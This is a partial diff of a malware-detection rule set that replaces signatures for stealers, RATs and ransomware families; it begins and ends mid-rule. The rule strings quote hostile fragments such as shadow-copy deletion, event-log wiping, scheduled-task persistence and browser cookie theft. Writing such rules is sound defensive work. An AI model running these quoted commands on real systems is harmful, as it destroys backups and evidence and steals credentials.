00 20 00 ?? ?? 20 00 69 00 73 00 20 00 + 6f 00 66 00 66 00 6c 00 69 00 6e 00 65 00 2e 00 + 2e 00 2e 00 00 ?? 5b 00 2b 00 5d 00 20 00 53 00 + 65 00 72 00 76 00 65 00 72 00 20 00 00 ?? ?? 00 + 69 00 73 00 20 00 6f 00 6e 00 6c 00 69 00 6e 00 + 65 00 } + $s2 = "Writing is not alowed" wide + $s3 = "System\\ProcessList.txt" fullword wide + $s4 = "[X] GetSSL ::" fullword wide + $s5 = "Failed to steal " wide + $s6 = "StealerStub" fullword ascii + $s7 = "/C chcp 65001 && netsh" wide + $n1 = "fetch_options" fullword wide + $n2 = "send_report" fullword wide + $n3 = "?username=" fullword wide condition: - uint16(0)==0x5a4d and 2 of them + uint16(0)==0x5a4d and ((1 of ($x*) and any of them ) or all of ($n*) or 5 of ($s*) or (1 of ($n*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Toxiceye : FILE +rule DITEKSHEN_MALWARE_Win_Tofsee : FILE { meta: - description = "Detects ToxicEye / TelegramRAT. Observed used as the basis for many infostealers" + description = "Detects Tofsee" author = "ditekSHen" - id = "99304f11-2444-5864-b174-514bb5bef0f7" - date = "2024-09-06" - modified = "2024-09-06" + id = "86371c0b-72f9-56c0-9f34-f14d2a069c91" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10955-L10973" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ee01c107dd295b923801c0d1a77b1534d3a5f2abf8d2cfa93c6786a1b0553504" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8933-L8949" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9ef06643173c70c5b06b19200cb5b5efa7db7eb3516b67621f0b1975f1c80781" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "[~] Handling command" wide - $s2 = "[?] Sleeping {0}" wide - $s3 = "GETPASSWORDS" wide - $s4 = "FORKBOMB" wide - $s5 = "SENDKEYPRESS" wide - $s6 = "KEYLOGGER" wide - $s7 = "/ToxicEye/master/TelegramRAT/" wide - $s8 = "desktopScreenshot" ascii - $s9 = "MeltFile" ascii - $s10 = "AutoStealer" ascii - $s11 = /\/LimerBoy\/(ToxicEye|Adamantium-Thief|hackpy)/ wide + $s1 = "n%systemroot%\\system32\\cmd.exe" fullword wide + $s2 = "loader_id" fullword ascii + $s3 = "start_srv" fullword ascii + $s4 = "lid_file_upd" fullword ascii + $s5 = "localcfg" fullword ascii + $s6 = "Incorrect respons" fullword ascii + $s7 = "mx connect error" fullword ascii + $s8 = "Error sending command (sent = %d/%d)" fullword ascii + $s9 = "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u" fullword ascii condition: - uint16(0)==0x5a4d and 7 of them + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Rdpcredsstealerinjector : FILE +rule DITEKSHEN_MALWARE_Win_Khonsari : FILE { meta: - description = "Detects RDP Credentials Stealer injector" + description = "Detects Khonsari ransomware" author = "ditekSHen" - id = "221b7d64-6585-5f3a-bffa-bde05390db73" - date = "2024-09-06" - modified = "2024-09-06" + id = "2d562e62-a948-570d-8ff2-cc4835b91573" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L10994-L11007" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0dfade8dde987f5134158b7c4abc3eaf8dcece86e1ff2ab1da4466da316939a2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8951-L8963" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2a78f36259481fccb31b2e6248fed19699b6eb05bacfd08905414764c3045943" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav1 = "MALWARE.Win.Trojan.RDPCredsStealer-Injector" strings: - $s1 = "\\APIHookInjectorBin\\" ascii - $s2 = "\\RDPCredsStealerDLL.dll" ascii - $s3 = "DLL Injected" ascii - $s4 = "Code Injected" ascii - $s5 = /(OpenProcess|VirtualAllocEx|CreateRemoteThread)\(\) failed:/ fullword ascii + $x1 = ".khonsari" fullword wide nocase + $s1 = "Encrypt" fullword ascii + $s2 = "CreateEncryptor" fullword ascii + $s3 = "GenerateKey" fullword ascii + $s4 = "277e5e6a-4da6-4138-97fa-3fecbdad0176" ascii condition: - uint16(0)==0x5a4d and 3 of them + uint16(0)==0x5a4d and ((1 of ($x*) and 2 of ($s*)) or ( all of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Krakenstealer : FILE +rule DITEKSHEN_MALWARE_Win_Quantum : FILE { meta: - description = "Detect Kraken infostealer" + description = "Detects Quantum locker / ransomware" author = "ditekSHen" - id = "460eb574-99c9-5f78-9efa-7a8808aaaae7" - date = "2024-09-06" - modified = "2024-09-06" + id = "76a9240e-5b4f-5a1e-9841-e5ba855fb06f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11009-L11030" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7f15823db706e6e51d8ea58fb026efb49f42234255d2f448614dc645d12648bb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8965-L8987" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f35422d1f52f1f9f55a5e38c782d2cf621cd84da028358ab250584334d41249c" score = 75 - quality = 73 + quality = 75 tags = "FILE" - snort = "923828002" strings: - $x1 = /Kraken(_)?(Stub|Keyboard|Clipboard|GeneratorMachine|PostLogs|Screenshot|Keylogs|Password)/ ascii wide - $s1 = /(get|set)_(Clipboard|Keyboard|Screen)Recorder/ fullword ascii - $s2 = /Dumping(FileZilla|360_China|Opera|Epic|CocCoc|Thunderbird|Brave)/ fullword ascii - $s3 = "ScreenPostData" fullword ascii - $s4 = "encrypt_data" fullword ascii - $s5 = "KeyboardProc" fullword ascii - $s6 = "UploadsKeyboard" fullword ascii - $s7 = "ClpUploader" fullword ascii - $s8 = "StartKeylogger" fullword ascii - $s9 = "ClipoDetectedRemover" fullword ascii - $s10 = "Disable_Regis" fullword ascii - $s11 = "RecordedClips" fullword ascii - $s12 = "HoneyPotStatus" fullword ascii + $x1 = "\\tQuantum" ascii wide + $x2 = "Quantum Locker.

" ascii wide + $s1 = "ERROR" fullword wide + $s2 = ".log" fullword wide + $s3 = "SLOW" fullword wide + $s4 = "Create" fullword wide + $s5 = "Integrity" fullword wide + $s6 = "Disabled" fullword wide + $s7 = "Deny" fullword wide + $s8 = "FAST" fullword wide + $s9 = "Mandatory" fullword wide + $s10 = "plugin.dll" fullword ascii + $s11 = "NetGetDCName" fullword ascii + $s12 = "NetShareEnum" fullword ascii + $s13 = "NetGetJoinInformation" fullword ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 2 of ($s*)) or 9 of ($s*)) + ( uint16(0)==0x5a4d and ( all of ($x*) or 9 of ($s*) or (pe.number_of_exports==2 and pe.exports("RunW") and pe.exports("runW") and 5 of ($s*)))) or all of ($x*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Whiffyrecon : FILE +rule DITEKSHEN_MALWARE_Win_Owowa : FILE { meta: - description = "Detects Whiffy Recon" + description = "Detects Owowa" author = "ditekSHen" - id = "19b0f327-06ee-5f78-abac-9c4fbcad98ac" - date = "2024-09-06" - modified = "2024-09-06" + id = "c0a61601-e810-5acc-91a3-fa70db6d94da" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11032-L11052" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "58df9f47f5890c5e31d352be682c6164a940dad206ad29c54c43f70d3afb9543" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L8989-L9007" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "afdeb30845ed4ef7b79e733e05d3e1ee53a8c441db74519577893d75c1249a41" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "WLANSVC" fullword wide - $s2 = "f02fe1c0-137a-4802-8881-55dd300c5022" fullword wide - $s3 = "\\wlan.lnk" fullword wide - $s4 = "str-12.bin" wide - $s5 = "/geolocation/v1/geolocate?key=" wide - $s6 = "/wlan" fullword wide - $s7 = "/scanned" fullword wide - $s8 = "/bots/" fullword wide - $s9 = "wlan.pdb" fullword ascii - $s10 = "botId" fullword ascii - $s11 = "wifiAccessPoints" fullword ascii - $s12 = "considerIp" fullword ascii - $s13 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" fullword wide + $u1 = "jFuLIXpzRdateYHoVwMlfc" fullword ascii wide + $u2 = "Fb8v91c6tHiKsWzrulCeqO" fullword ascii wide + $u3 = "dEUM3jZXaDiob8BrqSy2PQO1" fullword ascii wide + $s1 = "powershell.exe" fullword wide + $s2 = "" wide + $s3 = "HealthMailbox" fullword wide + $s4 = "6801b573-4cdb-4307-8d4a-3d1e2842f09f" ascii + $s5 = "b__" ascii + $s6 = "ClearHeaders" fullword ascii + $s7 = "get_UserHostAddress" fullword ascii + $s8 = "ExtenderControlDesigner" fullword ascii condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and ( all of ($u*) or (2 of ($u*) and 3 of ($s*)) or 6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Quiterat : FILE +rule DITEKSHEN_MALWARE_Win_Chebka : FILE { meta: - description = "Detects QuiteRAT" + description = "Detects Chebka" author = "ditekSHen" - id = "54f7b899-3418-5074-8138-38cf073cda8c" - date = "2024-09-06" - modified = "2024-09-06" + id = "df486522-695c-56f5-b93a-6f16829a3a3e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11054-L11068" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "257f9151294254e3e86979f184963f0396587438393b11bad068ba0f386cfc4a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9009-L9030" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cc8123a5d20fac51d4dfc225e743539456efb4d649060d078c3ed93e7724da01" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "< No Pineapple! >" ascii - $x2 = ".?AVPineapple" ascii - $x3 = ".?AVApple@@" ascii - $s1 = "XgsdCwsRFxZF" ascii - $s2 = "XggZChkVRQ==" ascii - $s3 = "RxUZERQRHEU=" ascii - $s4 = "XhkbDBEXFkU" ascii + $s1 = "-k netsvcs" wide + $s2 = "%ssvchost.exe -k SystemNetworkService" wide + $s3 = "Mozilla/4.0 (compatible)" wide + $s4 = "_kasssperskdy" wide + $s5 = "winssyslog" wide + $s6 = "LoaderDll%d" wide + $s7 = "cmd.exe /c rundll32.exe shell32.dll," wide + $s8 = /cmd.exe \/c start (chrome|msedge|firefox|iexplorer)\.exe/ wide + $f1 = ".?AVCHVncManager@@" fullword ascii + $f2 = ".?AVCNetstatManager@@" fullword ascii + $f3 = ".?AVCTcpAgentListener@@" fullword ascii + $f4 = ".?AVIUdpClientListener@@" fullword ascii + $f5 = ".?AVCShellManager@@" fullword ascii + $f6 = ".?AVCScreenSpy@@" fullword ascii condition: - uint16(0)==0x5a4d and (( all of ($x*) and 1 of ($s*)) or (1 of ($x*) and 3 of ($s*))) + uint16(0)==0x5a4d and (5 of ($s*) or all of ($f*) or (3 of ($f*) and 3 of ($s*)) or (#s8>2 and 5 of them )) } import "pe" -rule DITEKSHEN_MALWARE_PWSH_CUMII +rule DITEKSHEN_MALWARE_Win_Flagpro : FILE { meta: - description = "Detects multi-dropper PowerShell" + description = "Detects Flagpro" author = "ditekSHen" - id = "07b77251-1d79-5521-8c05-ecfc662f45cb" - date = "2024-09-06" - modified = "2024-09-06" + id = "da1bf899-feb5-5ed0-956e-c20bc3565a6e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11070-L11086" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ab9e59b0552718928d170a988d129b38352700076847f2f409976016858864eb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9032-L9049" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c5e5944426b7be690ad62dd0d98a8fc6f8135cab0dbdd8a5aaf1670491eda59d" score = 75 quality = 75 - tags = "" - clamav = "ditekSHen.MALWARE.PWSH.CUMII" + tags = "FILE" strings: - $s1 = ".('{1}{$}'.replace('$','0')" ascii nocase - $s2 = ",'I').replace('!','ex')" ascii nocase - $s3 = "'.replace('*','0001')" ascii nocase - $s4 = "Remove-Item $" ascii nocase - $s5 = "the File will start cumiing" ascii nocase - $b1 = "011001100111010101101110011*" ascii - $b2 = "0101001000*1110110*010011111" ascii - $b3 = "01001101010110101001*11*0000" ascii + $s1 = "download...." fullword ascii + $s2 = "~MYTEMP" fullword wide + $s3 = ".?AVCV20_LoaderApp@@" fullword ascii + $s4 = ".?AVCV20_LoaderDlg@@" fullword ascii + $s5 = "ExecYes" fullword ascii + $s6 = /" wide - $s2 = "Domain Detect: detected {0}" wide - $s3 = "DOMAINDETECTCOOKIES" ascii - $s4 = /(Opera|Edge|Chrome|Brave|Vivaldi|Blink|Universal|Gecko|OperaGx|Firefox)Grabber/ fullword ascii - $u1 = "/antivm.php?id=" wide - $u2 = "/ferr.php?id=" wide - $u3 = ".php?ownerid=" wide - $u4 = "&buildid=" wide - $u5 = "&username=" wide - $u6 = "&BSSID=" wide - $u7 = "&rndtoken=" wide - $u8 = "&domaindetects=" wide + $s1 = "$Core | Add-Member @{IsReadOnly = $((Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly)} -Force" fullword ascii + $s2 = "$Core | Add-Member @{MinerCustomConfig = $((Get-Content \".\\Config\\MinerCustomConfig.json\" -Raw))} -Force" fullword ascii + $s3 = "If ($Variables.CheatGuy -and $Core.corehash -in $Hashes -and $Core.ScriptStartDate -le (Get-Date)" ascii + $s4 = "Try{(Get-ItemProperty -Path \".\\Includes\\Core.ps1\").IsReadOnly = $false} catch {}" fullword ascii + $s5 = " NPlusMiner/" ascii condition: - uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and (2 of ($s*) or 3 of ($u*))) or ( all of ($s*) and 3 of ($u*)) or (7 of ($u*))) + 3 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_TOITOIN_Kritaloader : FILE +rule DITEKSHEN_MALWARE_Win_PWSH_Poshcookiestealer { meta: - description = "Detects TOITOIN KritaLoader" + description = "Detects PowerShell PoshCookieStealer" author = "ditekSHen" - id = "5ff002fc-1108-554e-9de6-92d568826d1d" - date = "2024-09-06" - modified = "2024-09-06" + id = "7326a056-288b-534b-811d-172bd6936d7b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11116-L11127" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9629a4cfa606812d2579c0c0d486dec5971854e5133f0594a4638db5b89c3135" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9066-L9080" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "234958098d09732675dd539e8d25c6754ba50bf92b3a19e7fef8c68d70503ec4" score = 75 quality = 75 - tags = "FILE" - clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN" + tags = "" strings: - $p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii - $p2 = "DLL_Start_OK.pdb" ascii - $s1 = "krita_main" fullword ascii + $s1 = "\\User Data\\default\\Network\\Cookies" ascii nocase + $s2 = "Send-ToEmail" ascii + $s3 = "[Security.Cryptography.ProtectedData]::Unprotect($" ascii + $s4 = "$($env:LOCALAPPDATA)\\" ascii + $s5 = "$($env:HOMEPATH)\\" ascii + $s6 = "|ForEach-Object ToString X2) -join ''" ascii + $s7 = ".Attachments.Add($" ascii condition: - uint16(0)==0x5a4d and (1 of ($p*) and 1 of ($s*)) + 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_TOITOIN_Injectordll : FILE +rule DITEKSHEN_MALWARE_Win_Garrantdecrypt : FILE { meta: - description = "Detects TOITOIN InjectorDLL" + description = "Detects GarrantDecrypt ransomware" author = "ditekSHen" - id = "40776e0a-29df-52ea-8486-35027ab31a1b" - date = "2024-09-06" - modified = "2024-09-06" + id = "e3be3663-9978-5b8e-b6b2-0f44f269adb2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11129-L11141" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fc80c702305657ba1058ca7f55579d1d5254dd0f619c5f7fda7886a868b65c93" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9082-L9096" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "84b139e51f0ef0389c641d62409d702b0ae7ec6ecd2fa54baf2cf0c0078a8f5a" score = 75 - quality = 25 + quality = 75 tags = "FILE" - clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN" strings: - $p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii - $p2 = "DLL_START_IN.pdb" ascii - $s1 = ".ini" fullword ascii - $s2 = "\\users\\Public\\Documents\\" fullword ascii + $x1 = "%appdata%\\_uninstalling_.png" fullword wide + $x2 = "C:\\Windows\\sysnative\\vssadmin.exe" fullword wide + $x3 = /(ICQ|Skype) (@nuncatarde|@supersuso|@Whitehorsedecryption|@likeahorse|@Konwarszawski|@zipzipulya|Whitehorsedecryption|LIKEAHORSE DECRYPTION|Zip Zipulya)/ ascii + $s1 = "your unique ID" ascii + $s2 = "Google market ICQ" ascii + $s3 = "If you want to restore them, install ICQ" ascii + $s4 = "Write to our ICQ @" ascii condition: - uint16(0)==0x5a4d and (1 of ($p*) and all of ($s*)) + uint16(0)==0x5a4d and ((2 of ($x*) and 1 of ($s*)) or all of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_TOITOIN_Downloader : FILE +rule DITEKSHEN_MALWARE_Win_Locked : FILE { meta: - description = "Detects TOITOIN Downloader" + description = "Detects Locked ransomware" author = "ditekSHen" - id = "0282ea26-e381-5c9a-9dad-c90246d8add0" - date = "2024-09-06" - modified = "2024-09-06" + id = "ad2f91ab-9bbb-5d47-a5c3-5a38dbab2ebe" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11143-L11154" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d7e5e99c9266ec144152c3d1066e0e1a862f48ded17fab8f504192ca48219826" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9098-L9114" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b838b996946fb268c66bac68d5e326ff3049340dfb08f2e0a77492df49915d5a" score = 75 - quality = 75 + quality = 73 tags = "FILE" - clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN" strings: - $p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii - $s1 = { 20 2f 63 20 22 [6-15] 63 00 6d 00 64 00 00 00 6f 00 70 00 65 00 6e } - $o1 = { 48 83 fa 10 72 34 48 8b 8d 10 ?? 00 00 48 ff c2 } + $x1 = "http://xxxx.onion/xxxx-xxxx-xxxx-xxxx" ascii + $x2 = "http://pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion" ascii + $x3 = "dHA6Ly94eHh4Lm9uaW9uL3h4eHgteHh4eC14eHh4LXh4eHg" ascii + $s1 = "choice /t 1 /d y /n >nul" ascii + $s2 = ".locked" fullword ascii + $s3 = "c:\\system volume information" fullword ascii + $s4 = "__$$RECOVERY_README$$__.html" fullword ascii + $s5 = "Trunc..." fullword ascii + $s6 = /C:\\windows\\temp\\[a-z0-9A-Z]{6}\.tmp/ fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and ( all of ($x*) or all of ($s*) or (1 of ($x*) and 4 of ($s*)) or (#s6>1 and 4 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Venomrat : FILE +rule DITEKSHEN_MALWARE_Win_Maze : FILE { meta: - description = "Detects VenomRAT" + description = "Detects Maze ransomware" author = "ditekSHen" - id = "93cd5ae3-c222-51a2-bbb9-bdd3254006e5" - date = "2024-09-06" - modified = "2024-09-06" + id = "f5d1d3e2-1ffe-5ec6-b1ee-bded81867fb8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11156-L11170" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "47d343def76a323c66db4ba6fb1c0d119f45323f9b7f36695e4aeb7b070819d7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9116-L9145" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d3ce3b43c65dfd9f59ba3c6b64e8d7687db175673cc62068caa1e1da023390c0" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "Venom RAT + HVNC" fullword ascii - $x2 = "Venom" fullword ascii - $x3 = "VenomByVenom" fullword wide - $s1 = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" fullword wide - $s2 = "UmVjZWl2ZWQ" wide - $s3 = "Pac_ket" fullword wide - $s4 = "Po_ng" fullword wide + $x1 = "Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c" ascii + $s1 = "\"%s\" shadowcopy delete" wide + $s2 = "[%windir%\\system32\\wbem\\wmic" wide + $s3 = "process call create \"cmd /c start %s\"" wide + $s4 = "DECRYPT-FILES.html" fullword wide + $s5 = "Dear %s, your files" wide + $s6 = "%s! Alert! %s! Alert!" wide + $s7 = "%BASE64_PLACEHOLDER%" fullword ascii + $s8 = "-orDGorX0or" fullword ascii + $s9 = { 47 45 54 20 2f 25 73 20 48 54 54 50 2f 31 2e 31 + 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 + 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 43 6f 6e 6e + 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 + 76 65 0d 0a 0d 0a 00 50 4f 53 54 20 2f 25 73 20 + 48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 + 67 65 6e 74 3a 20 25 73 0d 0a 48 6f 73 74 3a 20 + 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 + 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 + 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e 6e 65 63 + 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 + 0d 0a 0d 0a 00 0d 0a 0d 0a 00 43 6f 6e 74 65 6e + 74 2d 4c 65 6e 67 74 68 3a 20 00 } condition: - uint16(0)==0x5a4d and (1 of ($x*) and 2 of ($s*)) + uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or 6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Sapphirestealer : FILE +rule DITEKSHEN_MALWARE_Win_Teslarevenge : FILE { meta: - description = "Detects SapphireStealer" + description = "Detects TeslaRevenge ransomware" author = "ditekSHen" - id = "ed6cffe4-23f1-5791-b07d-75abb698c899" - date = "2024-09-06" - modified = "2024-09-06" + id = "13e5bb15-47eb-5e49-a1a5-3d51cacede2f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11172-L11190" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "97088c0decf158d45a02571bd50b5f370c139339c19b8071f38c0f9816232d1f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9147-L9167" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0f68eae8a076d00c8d058ec148d3557f5770dc827d4690b931faf98797426dbc" score = 75 - quality = 75 + quality = 65 tags = "FILE" strings: - $s1 = "Sapphire.Modules." ascii - $s2 = "sapphire\\" wide - $s3 = "by r3vengerx0" wide - $s4 = "Sapphire\\obj\\" ascii - $s5 = "[ERROR_GETSECRETKEY_METHOD]" fullword wide - $s6 = "[ERROR_CANT_GET_PASSWORD]" fullword wide - $s7 = "

------NEW LOGS------

" wide - $s8 = "[ERROR] can't create grab directory" wide - $s9 = "d__" ascii - $s10 = "UploadToTelegram" ascii - $s11 = ".SendLog+d__" ascii + $s1 = "autospreadifnoav=" ascii wide + $s2 = "autospread=" ascii wide + $s3 = "noencryptext=" ascii wide + $s4 = "teslarvng" wide + $s5 = "finished encrypting" wide nocase + $s6 = "net scan" wide nocase + $s7 = "for /f %%x in ('wevtutil el') do wevtutil cl" ascii + $s8 = "tasklist | find /i \"SDELETE.exe\"" ascii + $e1 = "mshta.exe" ascii wide nocase + $e2 = "sc.exe" ascii wide nocase + $e3 = "vssadmin.exe" ascii wide nocase + $e4 = "wbadmin.exe" ascii wide nocase + $e5 = "cmd.exe" ascii wide nocase condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (4 of ($s*) or ( all of ($e*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_R77 : FILE +rule DITEKSHEN_MALWARE_Win_Lokilocker : FILE { meta: - description = "Detects r77 rootkit" + description = "Detects LokiLocker ransomware" author = "ditekSHen" - id = "813d207e-c6d9-5fea-8387-19da33bc3317" - date = "2024-09-06" - modified = "2024-09-06" + id = "4f4927c5-79e6-5c5a-b84d-c4728affe9e1" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L11192-L11217" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e3ec6e88a3a77b7dc69eb51a528e6417f6b8695c7cb01d699cf248cebd9b84e2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9169-L9194" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bf78f5e8f40c1a19f6b078a85854e95d5ef1f321393a831edda17b0d65515da7" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "startup" fullword wide - $s2 = "process_names" fullword wide - $s3 = "paths" fullword wide - 